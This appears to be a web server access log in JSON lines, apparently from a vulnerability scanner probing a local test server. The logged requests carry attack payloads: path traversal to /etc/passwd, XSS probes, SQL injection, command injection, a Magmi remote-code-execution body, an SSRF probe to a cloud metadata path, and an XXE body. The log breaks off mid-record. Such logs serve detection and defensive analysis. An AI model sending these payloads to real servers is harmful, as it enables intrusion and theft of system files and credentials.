+{"@timestamp": "18/May/2022:05:24:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"19.940","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-requests-log.http HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /action/usermanager.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KAnkW0OnVbDLmVe2jZ9aUixWv.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebConsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-client.cookies HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/cluster/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=/etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dispatcher/invalidate.cache HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_saveprofile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"SPOOLDIR=test\x22.system(id).\x22&recheck=Recheck","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/users?username=anonymous HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 